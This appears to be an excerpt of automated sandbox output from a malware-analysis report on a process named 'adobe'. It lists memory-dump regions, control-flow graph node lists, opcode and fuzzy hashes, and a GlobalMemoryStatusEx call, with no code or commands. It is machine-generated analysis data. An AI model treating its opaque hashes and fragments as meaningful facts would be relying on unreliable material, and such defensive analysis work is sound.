                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $eq$$eq
                                                        • API String ID: 0-2246304398
                                                        • Opcode ID: 1e4c721f8a86d8a3c1e202270d3f095ee67add0b536c91a5c93ea0073717436a
                                                        • Instruction ID: 463106e2d2a9f80fb7abb7addff9e99e4cc47da40205b94fc0b0a628450bce59
                                                        • Opcode Fuzzy Hash: 1e4c721f8a86d8a3c1e202270d3f095ee67add0b536c91a5c93ea0073717436a
                                                        • Instruction Fuzzy Hash: 91516134F115059FDB54EB74E950BAE73F6AB88310F108569D50AEB398EF31EC428B91

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1112 66f4ba0-66f4bd4 1114 66f4bd6-66f4bd9 1112->1114 1115 66f4bdb-66f4bf5 1114->1115 1116 66f4bfa-66f4bfd 1114->1116 1115->1116 1117 66f52dc-66f52de 1116->1117 1118 66f4c03-66f4cfb 1116->1118 1119 66f52e5-66f52e8 1117->1119 1120 66f52e0 1117->1120 1136 66f4d7e-66f4d85 1118->1136 1137 66f4d01-66f4d4e call 66f545a 1118->1137 1119->1114 1122 66f52ee-66f52fb 1119->1122 1120->1119 1138 66f4d8b-66f4dfb 1136->1138 1139 66f4e09-66f4e12 1136->1139 1150 66f4d54-66f4d70 1137->1150 1156 66f4dfd 1138->1156 1157 66f4e06 1138->1157 1139->1122 1153 66f4d7b-66f4d7c 1150->1153 1154 66f4d72 1150->1154 1153->1136 1154->1153 1156->1157 1157->1139
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: fjq$XPjq
                                                        • API String ID: 0-1938862144
                                                        • Opcode ID: dfeb28f3e23f39a7d6b848fed52fb99f1c4269aae1d8aa6e3a502462a747aeae
                                                        • Instruction ID: ac8c5300ad7d84958a937965828863bcbf4a39b6cd59d54c536685d83daeb54b
                                                        • Opcode Fuzzy Hash: dfeb28f3e23f39a7d6b848fed52fb99f1c4269aae1d8aa6e3a502462a747aeae
                                                        • Instruction Fuzzy Hash: F8516174F102089FEB549FB5C854BAFBBF6EF88700F208529E106AB395DE759C458B90

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1340 29ced40-29ced5b 1341 29ced5d-29ced84 1340->1341 1342 29ced85-29ced9b 1340->1342 1363 29ced9d call 29cee28 1342->1363 1364 29ced9d call 29ced40 1342->1364 1345 29ceda2-29ceda4 1346 29cedaa-29cee09 1345->1346 1347 29ceda6-29ceda9 1345->1347 1354 29cee0f-29cee9c GlobalMemoryStatusEx 1346->1354 1355 29cee0b-29cee0e 1346->1355 1359 29cee9e-29ceea4 1354->1359 1360 29ceea5-29ceecd 1354->1360 1359->1360 1363->1345 1364->1345
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4036178019.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_29c0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a12dd49b4d6dff212806f8bb2e8cac8826497c019def0d487b3de54e030e0f60
                                                        • Instruction ID: 3a00a7769789a488f1f4b0e74d9b8e2de626a2475ceefd6d4a0aee3d25445f71
                                                        • Opcode Fuzzy Hash: a12dd49b4d6dff212806f8bb2e8cac8826497c019def0d487b3de54e030e0f60
                                                        • Instruction Fuzzy Hash: A6412571D043499FCB14CFA9D8046AEBBF5EF89310F1585AAD404AB291DB749845CBE1

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1444 29cee28-29cee9c GlobalMemoryStatusEx 1446 29cee9e-29ceea4 1444->1446 1447 29ceea5-29ceecd 1444->1447 1446->1447
                                                        APIs
                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 029CEE8F
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4036178019.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_29c0000_adobe.jbxd
                                                        Similarity
                                                        • API ID: GlobalMemoryStatus
                                                        • String ID:
                                                        • API String ID: 1890195054-0
                                                        • Opcode ID: f7a8934ace8a1950b2949e0fc570ba5c5b14dc9deb4562ada3a8348cd4d673a2
                                                        • Instruction ID: c767cccaeb6322c9076b503700a576519d2090cae2f20589e0e3a115b85afbff
                                                        • Opcode Fuzzy Hash: f7a8934ace8a1950b2949e0fc570ba5c5b14dc9deb4562ada3a8348cd4d673a2
                                                        • Instruction Fuzzy Hash: 2D1120B1C006599FDB10CF9AC944BDEFBF8EF48320F15816AD818A7240D378A944CFA6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PHeq
                                                        • API String ID: 0-2873676430
                                                        • Opcode ID: e374d28f72e1c2863d25a93c4023ba1e3c8a6c8b8d7f16b670dc5acb6beaffde
                                                        • Instruction ID: 298d2ed777530060342bb103fffdfb3293c088872f8631c0163b7bee0b95ebbf
                                                        • Opcode Fuzzy Hash: e374d28f72e1c2863d25a93c4023ba1e3c8a6c8b8d7f16b670dc5acb6beaffde
                                                        • Instruction Fuzzy Hash: 6C419F70E106099FDB65DF75D4847AEBBB6BF85300F244929E505EB344EB70A846CB81
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PHeq
                                                        • API String ID: 0-2873676430
                                                        • Opcode ID: e23af465703e8317d11235edc440ed8ba5a7d68b7501e87e1a8877e6e82b9304
                                                        • Instruction ID: 6d1f193db1a3682404b5653f1e60e120cb0ce80d98490e2b89ed1b2f92100ef9
                                                        • Opcode Fuzzy Hash: e23af465703e8317d11235edc440ed8ba5a7d68b7501e87e1a8877e6e82b9304
                                                        • Instruction Fuzzy Hash: 4931D271B102058FDB59ABB4D56466F7BF7AF89300F204428D506EB399EE36DE42CB90
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \Ojq
                                                        • API String ID: 0-1665755004
                                                        • Opcode ID: 41918ec608ed31ed0b1fe9a9d6ba1b76926c11a1ebff54a4be0b04d9052f54e3
                                                        • Instruction ID: b7d6e7629fba50a70852af5f2b09602e239103a66076415ca7e331f14aa8b8bd
                                                        • Opcode Fuzzy Hash: 41918ec608ed31ed0b1fe9a9d6ba1b76926c11a1ebff54a4be0b04d9052f54e3
                                                        • Instruction Fuzzy Hash: EDF0FE30E60129DFDB14DF94E999BAE7BF2FF84700F200529E102A7299CB741C05CB80
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 37662ccf907271b7141ee38b65bfbc9529c7efac48d739d2d34db38f93b87eeb
                                                        • Instruction ID: 23a04c90c03b77d90473265dad741afe98eb926a2e63d83a0d8cd409a7897420
                                                        • Opcode Fuzzy Hash: 37662ccf907271b7141ee38b65bfbc9529c7efac48d739d2d34db38f93b87eeb
                                                        • Instruction Fuzzy Hash: B1925434E102048FDBA4DBA8C594A5DBBF2FB48314F5484A9E509EB365DB35ED85CF80
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d083d81875d0b0282cf827ecbd2b74ab067f91bd93329c4aaca720ee89d649ab
                                                        • Instruction ID: 14dc7790a3147965c14ea86e0d7a907c366c4f00d11297ea0b1352956a3e48df
                                                        • Opcode Fuzzy Hash: d083d81875d0b0282cf827ecbd2b74ab067f91bd93329c4aaca720ee89d649ab
                                                        • Instruction Fuzzy Hash: 2B61B271F100114FDF509B7EC88066FAAD7AFD4220B254439E90AEB364DEAADD0287C1
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 075675aee74f7703571c7a1edeb7aef850da5c861e4d75d2a86a0364e206016f
                                                        • Instruction ID: bf0ea654b598de323d52e6f9fa24c51f038ba1ed61ea352df56aec6225066987
                                                        • Opcode Fuzzy Hash: 075675aee74f7703571c7a1edeb7aef850da5c861e4d75d2a86a0364e206016f
                                                        • Instruction Fuzzy Hash: 2B815A34B106098BDB54EFA9D5507AEB7F3EB88300F108529D50AEB799EF34DC428B91
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 512fa96f7d7aade4b33003a314b77ca84ab98791def6e63cc889f2b643a43dca
                                                        • Instruction ID: c12b4019a4cace1fb9faaa269094562a18d8535bd75b4d97bf6558ada690cf57
                                                        • Opcode Fuzzy Hash: 512fa96f7d7aade4b33003a314b77ca84ab98791def6e63cc889f2b643a43dca
                                                        • Instruction Fuzzy Hash: 42913E70E102199FDF50DF65C840B9AB7B1FF85300F208599E549BB395DB70AA85CF91
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5e5f8fc82f12b3412b6eed27cd70a6babc5278eebd9115b372a4ab6e98053176
                                                        • Instruction ID: 91ef4f23c4260a3a7f54ee3ac7430c12b71b731e01f449a6e51ee48572b82c89
                                                        • Opcode Fuzzy Hash: 5e5f8fc82f12b3412b6eed27cd70a6babc5278eebd9115b372a4ab6e98053176
                                                        • Instruction Fuzzy Hash: EA914F70E102198BDF60DF65C840B9EB7B1FF89300F208599E549BB395EB70AA85CF90
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5b861334a767b417b763fc517dbf5660bd754e40b93144a47b1480f018fb3ffe
                                                        • Instruction ID: 4a55eb078e0c18b7454d5d07aee025f2a1ea4bc5d7764714a50cdb50fb498802
                                                        • Opcode Fuzzy Hash: 5b861334a767b417b763fc517dbf5660bd754e40b93144a47b1480f018fb3ffe
                                                        • Instruction Fuzzy Hash: B3715B70A102099FDB54DFA9D980A9EBBF6FF88300F248529E105EB365DB30ED46CB41
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 862da766c85969f56d974122370dcf70933f394ec7180c96e2e6eddb34aee257
                                                        • Instruction ID: 72923115e7b5b53eacabfaeff969304b1d2bd7965f0c6ab7cc17c1e1df35a59b
                                                        • Opcode Fuzzy Hash: 862da766c85969f56d974122370dcf70933f394ec7180c96e2e6eddb34aee257
                                                        • Instruction Fuzzy Hash: F7714B70A102099FDB54DFA9D980A9EBBF6FF88304F248529E505EB365DB30ED46CB41
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8052169679978363cbb5cd4e006a648db6aff7ffb75d93ace842b1c2ee1f8ec3
                                                        • Instruction ID: 5707c02ea325e83a58e539e83cbac1a796387da4e63bae084c1a9b9aa1e185c3
                                                        • Opcode Fuzzy Hash: 8052169679978363cbb5cd4e006a648db6aff7ffb75d93ace842b1c2ee1f8ec3
                                                        • Instruction Fuzzy Hash: FE51E131E10109DFDF64EB78E4946AEBBB2FF85315F108869E206DB354DB319855CB80
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ab2eaa50fc7622ae24929bc515ad883f59c9008f795c0e9588060abb1bcb7d42
                                                        • Instruction ID: 1a88ddaa232b60252a804168c25a5d5b8ccde5b893240445a1ac735494aaadcf
                                                        • Opcode Fuzzy Hash: ab2eaa50fc7622ae24929bc515ad883f59c9008f795c0e9588060abb1bcb7d42
                                                        • Instruction Fuzzy Hash: A051C570B301149FEFA467BCD95477F369AD789310F20482AE60ADB7D9CA78CC858792
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 926674fc2d21a5a3084beefb6184646538215e22353fcd632160569747c4c715
                                                        • Instruction ID: f8b309c731ab94a6495806ffe32f11f8da75a107efeed6097b4fbcd4dd6096be
                                                        • Opcode Fuzzy Hash: 926674fc2d21a5a3084beefb6184646538215e22353fcd632160569747c4c715
                                                        • Instruction Fuzzy Hash: 2951D570B301048BEFA467BDD95473F369AD789310F20482AE60ADB799CE78CC858792
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 67c732d5a4c3658cf59c86a5b8776e4a49bc1a03b39ec65da52f6555085a4eb8
                                                        • Instruction ID: 2a7834588d61632b5226ff9c9a4e467119ab6a065616e111abd1d23a48bdf5b4
                                                        • Opcode Fuzzy Hash: 67c732d5a4c3658cf59c86a5b8776e4a49bc1a03b39ec65da52f6555085a4eb8
                                                        • Instruction Fuzzy Hash: 9C51A374E202059FDF718B69C48077EBBB2EB55310F24882AE26BDB395C635EC41CB91
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 59925fa9f8ff8d1a59ebf936e533df6af333f2bf6ac2fb3fb8720ad9e34ef58e
                                                        • Instruction ID: e19bddf650721caa25932b62b000c6d521c104edcc76891fe62a5751ab8f6cd9
                                                        • Opcode Fuzzy Hash: 59925fa9f8ff8d1a59ebf936e533df6af333f2bf6ac2fb3fb8720ad9e34ef58e
                                                        • Instruction Fuzzy Hash: 23413C71E106099FDF70CFA9D881AAFBBB2FB95310F10492AE216D7650D330ED598B91
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b6793eeed6c8190b367546db56bccbffaf7b63a57ee391b72af57f73370a04c9
                                                        • Instruction ID: 0dc2125fc969cb340e045acc9f27c1ead2e160200d1ddf71aca049a29c17f0d6
                                                        • Opcode Fuzzy Hash: b6793eeed6c8190b367546db56bccbffaf7b63a57ee391b72af57f73370a04c9
                                                        • Instruction Fuzzy Hash: 3731EC30E142099BDB64DF75D58069EB7F2FF45304F104929E501EB344EB70B946CB84
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1cdfa82475e76087032a34b0419e8c048e40795f7b92fe9f05ef5587fe64de43
                                                        • Instruction ID: 7a572a04ed932ed8ed5e02cbf5512691776b1f10165101ed09fd6e79d3f3210c
                                                        • Opcode Fuzzy Hash: 1cdfa82475e76087032a34b0419e8c048e40795f7b92fe9f05ef5587fe64de43
                                                        • Instruction Fuzzy Hash: 2431D230E102059FDB05CFA4D964A9EBBF6BF89300F108529EA16EB354DB30AD42CB90
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1e6d83b81c675e9b68ae1f28d875315bc59f15d836cd38d29e0f3808e50a6517
                                                        • Instruction ID: 56f6c410031e5ace3f52a27b9d0fa2cb9a03e1a16079546ab83aeb3c9dc0dcbe
                                                        • Opcode Fuzzy Hash: 1e6d83b81c675e9b68ae1f28d875315bc59f15d836cd38d29e0f3808e50a6517
                                                        • Instruction Fuzzy Hash: 4131A030E102099BCB54DFA4D96469EB7F6BF89300F108529EA16EB350EB71AD42CB90
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 24d07feb0b0cb6889d70214e1517178bd848fa3456deee063d8314a0f9516073
                                                        • Instruction ID: 96a5bcaa5ca16577db757a69c2b6e7cb991c8c28291fbbd447a4600f0a20ffd9
                                                        • Opcode Fuzzy Hash: 24d07feb0b0cb6889d70214e1517178bd848fa3456deee063d8314a0f9516073
                                                        • Instruction Fuzzy Hash: C0219CB9F512159FDB50DFA9DA40BAEBBF1EB88310F148029EA05E7354E734DC018B90
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8c0ac7a9b6698ef753e22e094dfdff24e388fac5f5398e01afd7ca141ba0c31d
                                                        • Instruction ID: 96012b15fb48f8995e57259466893fc702afed8b12001525e35d807ceb58fffc
                                                        • Opcode Fuzzy Hash: 8c0ac7a9b6698ef753e22e094dfdff24e388fac5f5398e01afd7ca141ba0c31d
                                                        • Instruction Fuzzy Hash: F6218E79F112159FDB90DF69DA40BAEBBF5EB88710F108029EA05E7354E730DD018B90
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4035793416.00000000028FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 028FD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_28fd000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2dbc028ebae066d207a4496a1e7645107d09705f11535a3637d035bc15c2072d
                                                        • Instruction ID: c4807c7bb4494133f4ea182ca3b22df5cd7354fbe0c8769bd40bab16b98e2de5
                                                        • Opcode Fuzzy Hash: 2dbc028ebae066d207a4496a1e7645107d09705f11535a3637d035bc15c2072d
                                                        • Instruction Fuzzy Hash: 092122B9504204DFDB54DF14D980B26BBA5FBC8318F24C56DEB0A8B682C33AD447CA62
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4035793416.00000000028FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 028FD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_28fd000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e250f586e900a9da33fe842a21a77dd0bfb4c9caace95f3f88802271856f3d3f
                                                        • Instruction ID: 92dd300224909cd6189ef734227ed8e62a5bf8bb3fb0f95823c749b9652906e3
                                                        • Opcode Fuzzy Hash: e250f586e900a9da33fe842a21a77dd0bfb4c9caace95f3f88802271856f3d3f
                                                        • Instruction Fuzzy Hash: CB215E7510D3C09FC703CB24D990711BF71EB86214F2985DBD9898F6A7C33A984ACB62
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0e59de66861f3e0171456191a420c75ffdefd2cb036248bf232ebc3929e51484
                                                        • Instruction ID: 6bffb81aae71c08635c4127f90712175ae470f5e4331f1ac38e5bfc38aa33ea1
                                                        • Opcode Fuzzy Hash: 0e59de66861f3e0171456191a420c75ffdefd2cb036248bf232ebc3929e51484
                                                        • Instruction Fuzzy Hash: 1E01B530B140111BD76497BDD810B5B77DBDBC5710F10843AF20ACB746ED62DC4247A9
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2437fcd5eb95105d28b2647c14ec36284a7120b24bef68576b2bc9b75464d6db
                                                        • Instruction ID: 897729ee4b074e381cd11ab179126c7ca15b27e59d91249b8571763e711b7f2e
                                                        • Opcode Fuzzy Hash: 2437fcd5eb95105d28b2647c14ec36284a7120b24bef68576b2bc9b75464d6db
                                                        • Instruction Fuzzy Hash: CE11A135B101254FDF549768D9146AF73EAEBC8610F014439C606EB358EFA5DC028BE1
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7e5d02e88276fbd46b1367487c733b5fbd36e3ab53c8baa8d55a6382f75631f5
                                                        • Instruction ID: df8c9c3beb2a6bccb89a708ae4893c70774de0196c6b21345ecd907dfee65b1c
                                                        • Opcode Fuzzy Hash: 7e5d02e88276fbd46b1367487c733b5fbd36e3ab53c8baa8d55a6382f75631f5
                                                        • Instruction Fuzzy Hash: 3521F4B1C10259AFDB10CF9AD884ADEFBF8FB48310F10812AE918B7310C3746944CBA5
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1a248314fe69f205ec238cefd56cd8760c4fd71b8525e30b4b48778c56e910bb
                                                        • Instruction ID: 9ca93261c1eabdb6279ac8864bcf041690273d7cb1d83c58e7b1bec61cba6d97
                                                        • Opcode Fuzzy Hash: 1a248314fe69f205ec238cefd56cd8760c4fd71b8525e30b4b48778c56e910bb
                                                        • Instruction Fuzzy Hash: BE01F739B101109FD761A778E850B6F7BEAEB85710F108629F20ECB340EE21DD4283D5
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7778b5b3e1ed358bb2c8e19ba12ca4f836438ae66969f055d4637aaf067794b1
                                                        • Instruction ID: bef64b1c4b13d129a8f9ac953c091a2149042bb15f67d8293395f37534508d0e
                                                        • Opcode Fuzzy Hash: 7778b5b3e1ed358bb2c8e19ba12ca4f836438ae66969f055d4637aaf067794b1
                                                        • Instruction Fuzzy Hash: 5A01F735F141500FDB6197FDD851B2E7BDACBC9620F14886AF20ACB391DD26DC424395
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 39dcece710c33859fecfd47981302bacb9b9952a533235e191158991fdc05291
                                                        • Instruction ID: 1792cde6f9726850f0cec40e882b8837db180c88752973e67e523b8677538a64
                                                        • Opcode Fuzzy Hash: 39dcece710c33859fecfd47981302bacb9b9952a533235e191158991fdc05291
                                                        • Instruction Fuzzy Hash: 7B01F236B204255BDF64A768EC147EF23EB9BC9610F054135D20AE7399EFA98C024BE1
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 84b98a7f164112cfc6a38c973423fa795d6cce5ebb9aa00252e4cf6aee16e668
                                                        • Instruction ID: a366e4fcb020a7b3d0bcf20cdafc48d9f6191f9d300e332d4fd61d3d3adc768c
                                                        • Opcode Fuzzy Hash: 84b98a7f164112cfc6a38c973423fa795d6cce5ebb9aa00252e4cf6aee16e668
                                                        • Instruction Fuzzy Hash: 2911C2B1D002599FCB00CF9AD884ACEFBF8FB48320F10812AE518A7340C374A544CBA5
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.4049670329.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_66f0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 99d18e0d93a81331b235c8e1c1052eca638fdbf895167e1c98492d884053db00
                                                        • Instruction ID: 7c60e7a08d4f1a486881b0fa2a9f87469edd8c951eb0b77fee2e62a3ef5f0bf4
